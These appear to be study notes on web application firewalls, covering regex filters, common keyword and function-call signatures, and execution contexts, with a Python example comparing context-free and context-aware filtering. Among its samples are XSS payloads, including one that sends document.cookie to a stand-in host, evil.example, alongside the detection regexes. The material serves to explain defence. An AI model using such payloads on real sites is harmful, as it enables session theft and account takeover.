Web application firewalls (WAFs) are:
- Generally Layer 7 (they inspect HTTP requests and responses, not packets)
- A security-usability tradeoff: tighter rules block more attacks but also more legitimate traffic
More about them:
- Mostly relevant to pen-testers, who have to get their payloads past them.
- Most companies deploy a commercial WAF from a handful of specific vendors rather than writing their own.
They usually use regexes to filter out payloads.
Common/general filters:
- Function calls, e.g. a regex such as '/\(.*\)/' (anything between parentheses)
- Keywords like 'onload', 'location', 'innerHTML'
- Array index operations (in some contexts), e.g. 'a[b][c]'
Execution contexts:
Where is the payload running?
- In a string, inside an HTML element, or as JS code
- Knowing the context helps reduce false positives: 'location' in a plain-text comment is harmless, 'location' in a JS string that the input can close is not
- Requires the WAF to be context aware, i.e. to know where the application will place the value and how it escapes it
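The filters listed above and the execution-context point can be seen side by side in a small example. The following Python is an added illustration written for these notes, not code from the notes' author or from any real WAF product: a context-free filter that applies the three generic regex rules to the raw value, next to a context-aware variant that only applies them once the value can actually escape the slot the application puts it in. The context names, the rule names and the sample inputs are all constructed for the example; the breakout rules assume the application itself quotes attributes and escapes nothing else.

```python
from __future__ import annotations
import re

# Generic signatures of the kind the notes describe. A context-free WAF runs
# these over the raw parameter value without knowing where it will land.
# (Rule names are made up for this example.)
GENERIC_RULES = {
    "function_call": re.compile(r"\w+\s*\(.*?\)", re.S),                 # name(...)
    "keyword":       re.compile(r"\b(onload|onerror|location|innerHTML)\b", re.I),
    "array_index":   re.compile(r"\w+(\[[^\]]*\]){2,}"),                  # a[b][c]
}

def generic_waf(value: str) -> list[str]:
    """Context-free filter: names of the rules the raw value trips, in rule order."""
    return [name for name, rx in GENERIC_RULES.items() if rx.search(value)]

# Context-aware filter. The value can only become code if it first breaks out
# of the place the application puts it, so we check for a break-out before
# looking for the generic signatures. Contexts are assumed for the example:
#   html_text     value is placed as text between tags
#   html_attr_dq  value is placed inside a double-quoted attribute
#   js_string_sq  value is placed inside a single-quoted JS string in a <script>
BREAKOUT = {
    "html_text":    re.compile(r"<\s*/?\s*[a-z]", re.I),   # must open a tag
    "html_attr_dq": re.compile(r'"'),                      # must close the attribute
    "js_string_sq": re.compile(r"'|</script", re.I),       # must close the string or the script
}

def context_aware_waf(value: str, context: str) -> list[str]:
    """Apply the generic rules only if the value can leave its execution context."""
    if not BREAKOUT[context].search(value):
        return []   # keywords and parentheses inside the context are inert data
    return generic_waf(value)

# Constructed sample inputs: two benign values and two attack payloads.
SAMPLES = [
    ("The new location of the office",                                        "html_text"),
    ("<img src=x onerror=alert(1)>",                                          "html_text"),
    ("user typed a[1][2] and foo(bar)",                                       "js_string_sq"),
    ("'; document.location='https://evil.example/?c='+document.cookie;//",   "js_string_sq"),
]

def compare(value: str, context: str) -> tuple[list[str], list[str]]:
    """Return (generic verdict, context-aware verdict) for one sample."""
    return generic_waf(value), context_aware_waf(value, context)

if __name__ == "__main__":
    for value, context in SAMPLES:
        generic, aware = compare(value, context)
        print(f"{context:13} generic={generic!s:32} context-aware={aware}")
```

Run stand-alone, the two benign values trip the generic rules ('location' in a sentence, 'a[1][2]' and 'foo(bar)' typed into a field that lands in a JS string) and pass the context-aware check, while both attack payloads are caught by either filter because each contains the break-out its context needs. The context-aware variant is only as good as its knowledge of the application's output encoding; if the application fails to escape a backslash in the JS-string case, for instance, the single-quote break-out rule above is incomplete.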